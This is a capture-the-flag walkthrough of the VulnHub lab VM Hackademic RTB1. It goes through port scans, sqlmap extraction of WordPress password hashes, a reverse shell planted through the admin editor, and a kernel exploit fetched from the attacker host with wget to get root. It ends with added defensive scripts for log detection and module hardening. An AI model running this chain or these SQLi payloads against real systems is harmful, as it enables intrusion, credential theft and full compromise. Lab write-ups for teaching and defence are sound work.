HACKADEMIC: RTB1


https://www.vulnhub.com/entry/hackademic-rtb1,17/

Host discovery

# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:15:01] 
$ nmap -sn 192.168.54.0/24                 
Nmap scan report for 192.168.54.8
Host is up (0.00057s latency).

nmap scan

7.93 ( https://nmap.org ) at 2023-03-15 15:15 CST
Nmap scan report for 192.168.54.8
Host is up (0.00093s latency).
Not shown: 65515 filtered tcp ports (no-response), 18 filtered tcp ports (host-unreach)
PORT   STATE  SERVICE
22/tcp closed ssh
80/tcp open   http

# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:16:26] C:1
$ sudo nmap -sT -sV -O -p22,80 192.168.54.8
[sudo] yunki 的密码:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-15 15:16 CST
Nmap scan report for 192.168.54.8
Host is up (0.00050s latency).
PORT   STATE  SERVICE VERSION
22/tcp closed ssh
80/tcp open   http    Apache httpd 2.2.15 ((Fedora))
MAC Address: 00:0C:29:01:8A:4D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.22 - 2.6.36
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.37 seconds

# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:16:40] 
$ sudo nmap -sU -p22,80 192.168.54.8
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-15 15:16 CST
Nmap scan report for 192.168.54.8
Host is up (0.00050s latency).
PORT   STATE    SERVICE
22/udp filtered ssh
80/udp filtered http
MAC Address: 00:0C:29:01:8A:4D (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds


# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:16:55] 
$ sudo nmap --script=vuln -p22,80 192.168.54.8
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-15 15:17 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.54.8
Host is up (0.00059s latency).

PORT   STATE  SERVICE
22/tcp closed ssh
80/tcp open   http
| http-enum: 
|_  /icons/: Potentially interesting folder w/ directory listing
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-trace: TRACE is enabled
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-vuln-cve2011-3192: 
|   VULNERABLE:
|   Apache byterange filter DoS
|     State: VULNERABLE
|     IDs:  BID:49303  CVE:CVE-2011-3192
|       The Apache web server is vulnerable to a denial of service attack when numerous
|       overlapping byte ranges are requested.
|     Disclosure date: 2011-08-19
|     References:
|       https://www.securityfocus.com/bid/49303
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
|       https://seclists.org/fulldisclosure/2011/Aug/175
|_      https://www.tenable.com/plugins/nessus/55976
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: 00:0C:29:01:8A:4D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 170.89 seconds

Web penetration

Directory scan

# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:16:08] 
$ dirb http://192.168.54.8/                     

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Mar 15 15:19:13 2023
URL_BASE: http://192.168.54.8/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.54.8/ ----
+ http://192.168.54.8/cgi-bin/ (CODE:403|SIZE:288)                                                                                                    
+ http://192.168.54.8/index.html (CODE:200|SIZE:1475)                                                                                                 
+ http://192.168.54.8/phpmyadmin (CODE:403|SIZE:290)                                                                                                  
+ http://192.168.54.8/phpMyAdmin (CODE:403|SIZE:290)                                                                                                  
                                                                                                                                                      
-----------------
END_TIME: Wed Mar 15 15:19:24 2023
DOWNLOADED: 4612 - FOUND: 4


# The page tells us the target is http://192.168.54.8/Hackademic_RTB1/
# Run dirb against that directory as well
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:41:06] 
$ dirb http://192.168.54.8/Hackademic_RTB1/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Mar 15 15:41:20 2023
URL_BASE: http://192.168.54.8/Hackademic_RTB1/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.54.8/Hackademic_RTB1/ ----
+ http://192.168.54.8/Hackademic_RTB1/index.php (CODE:500|SIZE:1881)               
==> DIRECTORY: http://192.168.54.8/Hackademic_RTB1/wp-admin/                       
==> DIRECTORY: http://192.168.54.8/Hackademic_RTB1/wp-content/                     
==> DIRECTORY: http://192.168.54.8/Hackademic_RTB1/wp-images/                      
==> DIRECTORY: http://192.168.54.8/Hackademic_RTB1/wp-includes/                    
+ http://192.168.54.8/Hackademic_RTB1/xmlrpc.php (CODE:200|SIZE:42)                
                                                                                   
---- Entering directory: http://192.168.54.8/Hackademic_RTB1/wp-admin/ ----
+ http://192.168.54.8/Hackademic_RTB1/wp-admin/admin.php (CODE:302|SIZE:0)         
+ http://192.168.54.8/Hackademic_RTB1/wp-admin/index.php (CODE:302|SIZE:0)         
                                                                               
-----------------
END_TIME: Wed Mar 15 15:41:44 2023
DOWNLOADED: 9224 - FOUND: 4

Browsing the site, 192.168.54.8/Hackademic_RTB1/?cat=1 turns out to be SQL-injectable, so run sqlmap against it directly.

sqlmap

# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:52:55] 
$ sqlmap -u "192.168.54.8/Hackademic_RTB1/?cat=1" --current-db --batch         

current database: 'wordpress'


# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:52:58] 
$ sqlmap -u "192.168.54.8/Hackademic_RTB1/?cat=1" -D wordpress --tables --batch

Database: wordpress
[9 tables]
+-------------------+
| wp_categories     |
| wp_comments       |
| wp_linkcategories |
| wp_links          |
| wp_options        |
| wp_post2cat       |
| wp_postmeta       |
| wp_posts          |
| wp_users          |
+-------------------+


# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:53:01] 
$ sqlmap -u "192.168.54.8/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users --columns --batch

Database: wordpress
Table: wp_users
[22 columns]
+---------------------+---------------------+
| Column              | Type                |
+---------------------+---------------------+
| ID                  | bigint(20) unsigned |
| user_activation_key | varchar(60)         |
| user_aim            | varchar(50)         |
| user_browser        | varchar(200)        |
| user_description    | longtext            |
| user_domain         | varchar(200)        |
| user_email          | varchar(100)        |
| user_firstname      | varchar(50)         |
| user_icq            | int(10) unsigned    |
| user_idmode         | varchar(20)         |
| user_ip             | varchar(15)         |
| user_lastname       | varchar(50)         |
| user_level          | int(2) unsigned     |
| user_login          | varchar(60)         |
| user_msn            | varchar(100)        |
| user_nicename       | varchar(50)         |
| user_nickname       | varchar(50)         |
| user_pass           | varchar(64)         |
| user_registered     | datetime            |
| user_status         | int(11)             |
| user_url            | varchar(100)        |
| user_yim            | varchar(50)         |
+---------------------+---------------------+


# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:53:14] 
$ sqlmap -u "192.168.54.8/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users -C user_nickname,user_pass,user_level --dump --batch

Database: wordpress                                                                                                                                                       
Table: wp_users
[6 entries]
+---------------+---------------------------------------------+------------+
| user_nickname | user_pass                                   | user_level |
+---------------+---------------------------------------------+------------+
| NickJames     | 21232f297a57a5a743894a0e4a801fc3 (admin)    | 1          |
| MaxBucky      | 50484c19f1afdaf3841a0d821ed393d2 (kernel)   | 0          |
| GeorgeMiller  | 7cbb3252ba6b7e9c422fac5334d22054 (q1w2e3)   | 10         |
| JasonKonnors  | 8601f6e1028a8e8a966f6c33fcd9aec4 (maxwell)  | 0          |
| TonyBlack     | a6e514f9486b83cb53d8d932f9a04292 (napoleon) | 0          |
| JohnSmith     | b986448f0bb9e5e124ca91d3d650f52c            | 0          |
+---------------+---------------------------------------------+------------+

Based on the column list, I pulled only the more important fields: nickname, password and user level. GeorgeMiller has the highest user_level, so try logging into the WordPress backend as that user. Visiting http://192.168.54.8/Hackademic_RTB1/wp-admin/ redirects straight to the login page.
Browsing around the backend shows that PHP files can be edited there, so try writing a reverse shell into one.
Start a listener, then visit http://192.168.54.8/Hackademic_RTB1/wp-content/plugins/hello.php

# yunki @ yunki in ~ [16:02:39] 
$ sudo nc -lvnp 443                                                                                                            
listening on [any] 443 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.8] 47172
bash: no job control in this shell
bash-4.0$ whoami
whoami
apache
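Both of the web-layer steps above, the sqlmap run against `?cat=1` and the reverse shell written through WordPress's built-in PHP editor, leave a clear trail in the Apache access log. The following Python detector is an added example for this writeup, not code from the original post or from the VulnHub author; it runs over constructed combined-format log lines modelled on that traffic. The client IP, timestamps, user agent string and the editor path `wp-admin/plugin-editor.php` are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format log lines modelled on this writeup's
# traffic: sqlmap probing /Hackademic_RTB1/?cat=1, then an authenticated user
# saving PHP through the plugin editor and fetching the modified hello.php.
# The editor path (plugin-editor.php), IP and timestamps are assumptions.
SAMPLE_LOG = """\
192.168.54.128 - - [15/Mar/2023:15:50:12 +0800] "GET /Hackademic_RTB1/?cat=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.168.54.128 - - [15/Mar/2023:15:52:55 +0800] "GET /Hackademic_RTB1/?cat=1%20AND%201%3D1 HTTP/1.1" 200 5123 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
192.168.54.128 - - [15/Mar/2023:15:52:56 +0800] "GET /Hackademic_RTB1/?cat=1%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%28user_login%2C0x3a%2Cuser_pass%29%2CNULL%20FROM%20wp_users--%20- HTTP/1.1" 200 5310 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
192.168.54.128 - - [15/Mar/2023:16:01:40 +0800] "POST /Hackademic_RTB1/wp-admin/plugin-editor.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.54.128 - - [15/Mar/2023:16:02:39 +0800] "GET /Hackademic_RTB1/wp-content/plugins/hello.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Each pattern is applied to a URL-decoded query parameter value.
SQLI_PATTERNS = {
    "union_select": re.compile(r"\bunion\b.{0,40}\bselect\b", re.I),
    "boolean_tautology": re.compile(r"\b(?:and|or)\b\s+\d+\s*=\s*\d+", re.I),
    "time_based": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "quote_or_comment": re.compile(r"'|--\s|/\*"),
}
SCANNER_UA = re.compile(r"sqlmap|havij|nikto", re.I)
EDITOR_PATHS = ("/wp-admin/plugin-editor.php", "/wp-admin/theme-editor.php")
PLUGIN_FILE = re.compile(r"/wp-content/plugins/[^?]+\.php$")


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def sqli_indicators(target):
    """Return the names of SQLi patterns matched by any decoded query value."""
    query = urlsplit(target).query
    hits = []
    for values in parse_qs(query, keep_blank_values=True).values():
        for value in values:
            for name, pattern in SQLI_PATTERNS.items():
                if pattern.search(value) and name not in hits:
                    hits.append(name)
    return hits


def analyze_access_log(log_text):
    """Return findings as dicts {'line', 'ip', 'category', 'detail'} in log order."""
    findings = []
    editor_writers = set()  # IPs that have POSTed to the built-in code editors
    for n, line in enumerate(log_text.splitlines(), start=1):
        rec = parse_line(line)
        if rec is None:
            continue
        path = urlsplit(rec["target"]).path
        hits = sqli_indicators(rec["target"])
        if hits:
            findings.append({"line": n, "ip": rec["ip"], "category": "sqli_probe",
                             "detail": ",".join(hits)})
        if SCANNER_UA.search(rec["ua"]):
            findings.append({"line": n, "ip": rec["ip"], "category": "scanner_user_agent",
                             "detail": rec["ua"]})
        if rec["method"] == "POST" and path.endswith(EDITOR_PATHS):
            editor_writers.add(rec["ip"])
            findings.append({"line": n, "ip": rec["ip"], "category": "code_editor_write",
                             "detail": path})
        # A direct fetch of a plugin file by a client that just edited code is the
        # classic sign of a web shell or reverse-shell stub being triggered.
        if rec["ip"] in editor_writers and PLUGIN_FILE.search(path):
            findings.append({"line": n, "ip": rec["ip"], "category": "edited_plugin_executed",
                             "detail": path})
    return findings


if __name__ == "__main__":
    for f in analyze_access_log(SAMPLE_LOG):
        print(f"line {f['line']:>2} {f['ip']:<15} {f['category']:<24} {f['detail']}")
```

The pattern match on decoded parameter values is deliberately narrow (UNION/SELECT, numeric tautologies, timing functions, quote and comment terminators) to keep false positives down on ordinary blog traffic; the editor-then-plugin-fetch correlation is what turns two individually unremarkable requests into a high-confidence alert. On the mitigation side, the `cat` parameter needs a parameterized query, WordPress's file editor is disabled with `define('DISALLOW_FILE_EDIT', true);` in wp-config.php, and the `TRACE is enabled` finding from the nmap vuln scan is cleared with `TraceEnable off` in the Apache configuration. The dumped `user_pass` values are unsalted MD5, which is why sqlmap could annotate most of them with the cleartext on the spot.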

Privilege escalation

bash-4.0$ uname -a
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
bash-4.0$ uname -r
uname -r
2.6.31.5-127.fc12.i686

Kali

# yunki @ yunki in ~/vulnhub/HackademicRTB1 [16:34:32] 
$ searchsploit 2.6.3 | grep "Privilege Escalation"
Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation (Metasploit)                                            | linux/local/44677.rb
Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Local Privilege Escalation (3)                                               | linux/local/9844.py
Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - 'Sendpage' Local Privilege Escalation (Metasploit)                                    | linux/local/19933.rb
Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Local Privilege Escalation (1)                                                                    | linux/local/33321.c
Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Local Privilege Escalation                                                                     | linux/local/40812.c
Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Local Privilege Escalation                                                       | linux_x86-64/local/15024.c
Linux Kernel 2.6.30 < 2.6.30.1 / SELinux (RHEL 5) - Local Privilege Escalation                                                           | linux/local/9191.txt
Linux Kernel 2.6.32 (Ubuntu 10.04) - '/proc' Handling SUID Privilege Escalation                                                          | linux/local/41770.txt
Linux Kernel 2.6.32 - 'pipe.c' Local Privilege Escalation (4)                                                                            | linux/local/10018.sh
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1)                                                    | linux/local/25444.c
Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation                                                                      | linux/local/15285.c
Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation                                                 | linux/local/15704.c
Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Local Privilege Escalation (1)                                     | linux/local/18411.c
Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation (2)                                                     | linux/local/35161.c
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation (1)                                                | linux_x86/local/15916.c
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escalation (2)                                            | linux/local/15944.c
Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - 'CAN BCM' Local Privilege Escalation                                                 | linux/local/14814.c
Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation                                                   | linux_x86-64/local/15023.c
Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation                                                     | linux/local/17787.c
Linux Kernel < 2.6.37-rc2 - 'ACPI custom_method' Local Privilege Escalation                                                              | linux/local/15774.c
ReiserFS (Linux Kernel 2.6.34-rc3 / RedHat / Ubuntu 9.10) - 'xattr' Local Privilege Escalation                                           | linux/local/12130.py

(That is a lot. I tried quite a few of these and none worked, until Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation finally succeeded TAT)

# yunki @ yunki in ~/vulnhub/HackademicRTB1 [16:36:03] 
$ searchsploit -m 15285.c                         
  Exploit: Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/15285
     Path: /usr/share/exploitdb/exploits/linux/local/15285.c
File Type: C source, ASCII text, with CRLF line terminators

Copied to: /home/yunki/vulnhub/HackademicRTB1/15285.c



# yunki @ yunki in ~/vulnhub/HackademicRTB1 [16:36:09] 
$ php -S 0:80
[Wed Mar 15 16:36:16 2023] PHP 7.4.15 Development Server (http://0:80) started

Target machine

bash-4.0$ wget http://192.168.54.128/15285.c
wget http://192.168.54.128/15285.c
--2023-03-15 01:59:35--  http://192.168.54.128/15285.c
Connecting to 192.168.54.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7155 (7.0K) [text/x-c]
Saving to: `15285.c.1'

     0K ......                                                100%  618M=0s

2023-03-15 01:59:35 (618 MB/s) - `15285.c.1' saved [7155/7155]

bash-4.0$ gcc 15285.c -o 15285  
gcc 15285.c -o 15285
bash-4.0$ chmod +x 15285  
chmod +x 15285
bash-4.0$ ./15285  
./15285
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc0aa19ac
 [+] Resolved default_security_ops to 0xc0955c6c
 [+] Resolved cap_ptrace_traceme to 0xc055d9d7
 [+] Resolved commit_creds to 0xc044e5f1
 [+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc0aa19ac
 [+] Resolved default_security_ops to 0xc0955c6c
 [+] Resolved cap_ptrace_traceme to 0xc055d9d7
 [+] Resolved commit_creds to 0xc044e5f1
 [+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc0aa19ac
 [+] Resolved default_security_ops to 0xc0955c6c
 [+] Resolved cap_ptrace_traceme to 0xc055d9d7
 [+] Resolved commit_creds to 0xc044e5f1
 [+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
whoami
root
ip a 
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:01:8a:4d brd ff:ff:ff:ff:ff:ff
    inet 192.168.54.8/24 brd 192.168.54.255 scope global eth0
    inet6 fe80::20c:29ff:fe01:8a4d/64 scope link 
       valid_lft forever preferred_lft forever
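The RDS exploit above works because an unprivileged process can ask the kernel to load the `rds` protocol module simply by creating a socket of that family; the module is not needed on a web server, and the standard hardening is an `install rds /bin/true` line in modprobe.d. The audit script below is an added example for this writeup, not code from the original post or from the exploit's author: it reads modprobe.d directives and a /proc/modules listing and reports, for each rarely needed protocol module, whether it is already resident, fully blocked, only protected against alias autoload, or loadable. The file contents are constructed sample input; on a real host you would feed it `/etc/modprobe.d/*.conf` and `/proc/modules`.

```python
# Constructed sample input standing in for /etc/modprobe.d/*.conf and
# /proc/modules; on a real host read those files instead.
SAMPLE_MODPROBE_CONF = """\
# Disable rarely used network protocols that unprivileged users can autoload
install dccp /bin/true
install sctp /bin/true
blacklist rds
"""
SAMPLE_PROC_MODULES = """\
ipv6 264000 12 - Live 0xf89c0000
"""

# Protocol modules that socket(2) can pull in on demand through the
# net-pf-<family> alias; none are needed on a typical web server.
UNNEEDED_PROTOCOLS = ("rds", "dccp", "sctp", "tipc")


def parse_modprobe(conf_text):
    """Return {module: 'install' | 'blacklist'} for the directives that matter here.

    'install <mod> /bin/true' (or /bin/false) wins over 'blacklist <mod>' because it
    also defeats an explicit modprobe, not just alias-based autoloading.
    """
    policy = {}
    for raw in conf_text.splitlines():
        parts = raw.split("#", 1)[0].split()
        if len(parts) >= 3 and parts[0] == "install" and parts[2] in ("/bin/true", "/bin/false"):
            policy[parts[1]] = "install"
        elif len(parts) == 2 and parts[0] == "blacklist":
            policy.setdefault(parts[1], "blacklist")
    return policy


def loaded_modules(proc_modules_text):
    """Module names from /proc/modules-style text (first column of each line)."""
    return {line.split()[0] for line in proc_modules_text.splitlines() if line.strip()}


def audit(conf_text, proc_modules_text, modules=UNNEEDED_PROTOCOLS):
    """Return {module: verdict}; verdict is 'loaded', 'blocked', 'alias-only' or 'loadable'."""
    policy = parse_modprobe(conf_text)
    loaded = loaded_modules(proc_modules_text)
    verdicts = {}
    for mod in modules:
        if mod in loaded:
            verdicts[mod] = "loaded"       # modprobe.d cannot help while it is resident
        elif policy.get(mod) == "install":
            verdicts[mod] = "blocked"      # neither alias autoload nor modprobe loads it
        elif policy.get(mod) == "blacklist":
            verdicts[mod] = "alias-only"   # socket()-driven autoload stopped, modprobe still works
        else:
            verdicts[mod] = "loadable"
    return verdicts


def remediation(verdicts):
    """modprobe.d lines that bring every module not already 'blocked' to 'blocked'."""
    return [f"install {mod} /bin/true" for mod, verdict in verdicts.items() if verdict != "blocked"]


if __name__ == "__main__":
    result = audit(SAMPLE_MODPROBE_CONF, SAMPLE_PROC_MODULES)
    for mod, verdict in result.items():
        print(f"{mod:<6} {verdict}")
    print("\n".join(remediation(result)))
```

A module reported as `loaded` needs a reboot (or `rmmod`, if nothing holds it) after the `install` line is added, and `alias-only` is worth calling out separately because `blacklist` alone is a common but incomplete fix. On the box in this writeup, kernel 2.6.31.5 on Fedora 12, the complete fix is of course the vendor kernel update; the module block is the compensating control that removes this attack surface on hosts that cannot be patched immediately.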